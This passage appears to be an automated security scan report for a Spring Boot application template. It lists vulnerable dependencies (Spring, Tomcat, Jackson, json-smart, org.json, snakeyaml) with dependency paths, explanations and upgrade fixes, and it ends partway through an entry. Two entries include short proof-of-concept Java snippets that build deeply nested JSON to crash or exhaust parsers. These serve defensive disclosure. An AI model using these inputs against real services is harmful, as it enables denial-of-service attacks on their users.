  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20

Overview

org.springframework:spring-beans is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.

Affected versions of this package are vulnerable to Relative Path Traversal when deployed on non-compliant Servlet containers. An unauthenticated attacker could gain access to files and directories outside the intended web root.

Notes:

  1. This is only exploitable if the application is deployed as a WAR or with an embedded Servlet container, the Servlet container does not reject suspicious sequences and the application serves static resources with Spring resource handling.

  2. Applications deployed on Apache Tomcat or Eclipse Jetty are not vulnerable, as long as default security features are not disabled in the configuration.

  3. This vulnerability was also fixed in the commercial versions 6.1.22 and 5.3.44.

Remediation

Upgrade org.springframework:spring-beans to version 6.2.10 or higher.

References

high severity

Improper Access Control

  • Vulnerable module: org.springframework.security:spring-security-core
  • Introduced through: org.springframework.boot:spring-boot-starter-security@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework.security:spring-security-core@5.7.3
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.1.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework.security:spring-security-core@5.7.3
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.1.10.

Overview

org.springframework.security:spring-security-core is a package that provides security services for the Spring IO Platform.

Affected versions of this package are vulnerable to Improper Access Control when the application uses AuthenticatedVoter directly and a null authentication parameter is passed to it. Exploiting this vulnerability resulting in an erroneous true return value.

Note

Users are not affected if:

  1. The application does not use AuthenticatedVoter#vote directly.

  2. The application does not pass null to AuthenticatedVoter#vote.

Remediation

Upgrade org.springframework.security:spring-security-core to version 5.7.12, 5.8.11, 6.0.10, 6.1.8, 6.2.3 or higher.

References

high severity

Access Restriction Bypass

  • Vulnerable module: org.springframework.boot:spring-boot-actuator-autoconfigure
  • Introduced through: org.springframework.boot:spring-boot-starter-actuator@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@2.7.11.

Overview

Affected versions of this package are vulnerable to Access Restriction Bypass due to improper implementation of wildcard pattern matching.

An application is vulnerable when all of the following are true:

  1. Users have code that can handle requests matching /cloudfoundryapplication/**. Typically, this will be if there is a catch-all request mapping which matches /**

  2. The application is deployed to Cloud Foundry.

Note: Applications using Spring Cloud Config Server can handle requests to /cloudfoundryapplication/** by default and can be vulnerable if deployed to Cloud Foundry.

An application is not vulnerable if any of the following is true:

  1. The application is not deployed to Cloud Foundry

  2. Users have disabled Cloud Foundry actuator endpoints with management.cloudfoundry.enabled set to false

  3. The application does not have handler mappings that can handle requests to /cloudfoundryapplication/**

Workaround

Users who are unable to upgrade to the fixed version can disable Cloud Foundry actuator endpoints by setting management.cloudfoundry.enabled to false.

Remediation

Upgrade org.springframework.boot:spring-boot-actuator-autoconfigure to version 2.5.15, 2.6.15, 2.7.11, 3.0.6 or higher.

References

high severity

Path Equivalence

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.3.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-websocket@9.0.65 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.3.9.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Path Equivalence in the doPut() function in DefaultServlet.java, which insecurely replaces path separators with .s.

If the Default Servlet is configured with writes enabled - which it is not by default - a user can exploit Tomcat's partial PUT functionality to achieve code execution via deserialization. The target URL containing sensitive uploaded files must be a sub-directory of a target URL for public uploads, and the malicious user must know the names of the target sensitive files, which are also uploaded using a partial PUT. If both attacker and target application are using the default storage location and it contains a library that deserializes untrusted code, the attacker can trigger the execution of malicious code.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 9.0.99, 10.1.35, 11.0.3 or higher.

References

high severity

Denial of Service (DoS)

  • Vulnerable module: com.fasterxml.jackson.core:jackson-databind
  • Introduced through: com.fasterxml.jackson.core:jackson-databind@2.13.1, com.fasterxml.jackson.dataformat:jackson-dataformat-xml@2.20.0 and others

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b com.fasterxml.jackson.core:jackson-databind@2.13.1
    Remediation: Upgrade to com.fasterxml.jackson.core:jackson-databind@2.13.2.1.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b com.fasterxml.jackson.dataformat:jackson-dataformat-xml@2.20.0 com.fasterxml.jackson.core:jackson-databind@2.13.1
    Remediation: Upgrade to com.fasterxml.jackson.dataformat:jackson-dataformat-xml@2.20.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.jsonwebtoken:jjwt-jackson@0.11.2 com.fasterxml.jackson.core:jackson-databind@2.13.1
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b net.sf.jasperreports:jasperreports@6.19.1 com.fasterxml.jackson.core:jackson-databind@2.13.1
    Remediation: Upgrade to net.sf.jasperreports:jasperreports@6.20.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b net.sf.jasperreports:jasperreports@6.19.1 com.fasterxml.jackson.dataformat:jackson-dataformat-xml@2.20.0 com.fasterxml.jackson.core:jackson-databind@2.13.1
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 com.fasterxml.jackson.core:jackson-databind@2.13.1
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@2.7.3.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 com.fasterxml.jackson.core:jackson-databind@2.13.1
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.3.

Overview

com.fasterxml.jackson.core:jackson-databind is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.

Affected versions of this package are vulnerable to Denial of Service (DoS) via a large depth of nested objects.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade com.fasterxml.jackson.core:jackson-databind to version 2.12.6.1, 2.13.2.1 or higher.

References

high severity

Denial of Service (DoS)

  • Vulnerable module: net.minidev:json-smart
  • Introduced through: org.springframework.hateoas:spring-hateoas@1.5.1

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 com.jayway.jsonpath:json-path@2.7.0 net.minidev:json-smart@2.4.8
    Remediation: Upgrade to org.springframework.hateoas:spring-hateoas@2.1.4.

Overview

net.minidev:json-smart is a Java JSON parser.

Affected versions of this package are vulnerable to Denial of Service (DoS) due to a StackOverflowError when parsing a deeply nested JSON array or object.

NOTE: Although this vulnerability was fixed in version 2.4.9 the maintainer recommends upgrading to 2.4.10, due to a remaining bug.

PoC

StringBuilder s = new StringBuilder();
for (int i = 0; i < 10000 ; i++) {
  s.append("{\"a\":");
}
s.append("1");
for (int i = 0; i < 10000 ; i++) {
  s.append("}");
}
JSONParser p = new JSONParser(JSONParser.MODE_JSON_SIMPLE);
p.parse(s.toString());

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade net.minidev:json-smart to version 2.4.9 or higher.

References

high severity

Denial of Service (DoS)

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.1.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-websocket@9.0.65 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.1.9.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Denial of Service (DoS) when processing a crafted HTTP/2 request. If the request exceeded any of the configured limits for headers, the associated HTTP/2 stream was not reset until after all of the headers had been processed.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 8.5.99, 9.0.86, 10.1.19, 1.0.0-M17 or higher.

References

high severity

Improper Input Validation

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
  • Introduced through: org.springframework.boot:spring-boot-starter-web@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.6.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-websocket@9.0.65 org.apache.tomcat.embed:tomcat-embed-core@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.6.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Improper Input Validation such that the JsonErrorReportValve does not escape the type, message or description values. In some circumstances these are constructed from user provided data and it is possible for users to supply values that invalidate or manipulate the JSON output.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 8.5.84, 9.0.69, 10.1.2 or higher.

References

high severity

Denial of Service (DoS)

  • Vulnerable module: org.apache.tomcat.embed:tomcat-embed-websocket
  • Introduced through: org.springframework.boot:spring-boot-starter-web@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-tomcat@2.7.3 org.apache.tomcat.embed:tomcat-embed-websocket@9.0.65
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.1.9.

Overview

Affected versions of this package are vulnerable to Denial of Service (DoS) when a WebSocket client can keep a WebSocket connection open which is leading to increased resource consumption.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-websocket to version 8.5.99, 9.0.86, 10.1.19, 1.0.0-M17 or higher.

References

high severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: org.json:json
  • Introduced through: org.json:json@20211205

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.json:json@20211205
    Remediation: Upgrade to org.json:json@20231013.

Overview

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling. An attacker can cause indefinite amounts of memory to be used by inputting a string of modest size. This can lead to a Denial of Service.

PoC

package orgjsonbug;

import org.json.JSONObject;

/**
 * Illustrates a bug in JSON-Java.
 */
public class Bug {
  private static String makeNested(int depth) {
    if (depth == 0) {
      return "{\"a\":1}";
    }
    return "{\"a\":1;\t\0" + makeNested(depth - 1) + ":1}";
  }

  public static void main(String[] args) {
    String input = makeNested(30);
    System.out.printf("Input string has length %d: %s\n", input.length(), input);
    JSONObject output = new JSONObject(input);
    System.out.printf("Output JSONObject has length %d: %s\n", output.toString().length(), output);
  }
}

Remediation

Upgrade org.json:json to version 20231013 or higher.

References

high severity

Denial of Service (DoS)

  • Vulnerable module: org.json:json
  • Introduced through: org.json:json@20211205

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.json:json@20211205
    Remediation: Upgrade to org.json:json@20230227.

Overview

Affected versions of this package are vulnerable to Denial of Service (DoS) in the XML.toJSONObject component via crafted JSON or XML data.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade org.json:json to version 20230227 or higher.

References

high severity

Denial of Service (DoS)

  • Vulnerable module: org.springframework.boot:spring-boot-autoconfigure
  • Introduced through: org.springframework.boot:spring-boot-devtools@2.7.3, org.springframework.boot:spring-boot-starter-actuator@2.7.3 and others

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-devtools@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3
    Remediation: Upgrade to org.springframework.boot:spring-boot-devtools@2.7.12.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@2.7.12.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@2.7.12.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@2.7.12.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@2.7.12.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@2.7.12.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@2.7.12.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.12.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@2.7.12.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@2.7.12.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.12.

Overview

Affected versions of this package are vulnerable to Denial of Service (DoS) if Spring MVC is used together with a reverse proxy cache.

Specifically, an application is vulnerable if all of the conditions are true:

  • The application has Spring MVC auto-configuration enabled. This is the case by default if Spring MVC is on the classpath.
  • The application uses Spring Boot's welcome page support, either static or templated.
  • The application is deployed behind a proxy which caches 404 responses.

The application is NOT vulnerable if any of the following are true:

  • Spring MVC auto-configuration is disabled. This is true if WebMvcAutoConfiguration is explicitly excluded, if Spring MVC is not on the classpath, or if spring.main.web-application-type is set to a value other than SERVLET.
  • The application does not use Spring Boot's welcome page support.
  • There is no proxy which caches 404 responses.

Workaround

Users who are unable to upgrade should configure the reverse proxy not to cache 404 responses and/or not to cache responses to requests to the root (/) of the application.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade org.springframework.boot:spring-boot-autoconfigure to version 2.5.15, 2.6.15, 2.7.12, 3.0.7 or higher.

References

high severity

Denial of Service (DoS)

  • Vulnerable module: org.yaml:snakeyaml
  • Introduced through: org.springframework.boot:spring-boot-starter-actuator@2.7.3, org.springframework.boot:spring-boot-starter-cache@2.7.3 and others

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.yaml:snakeyaml@1.30
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.0.0.
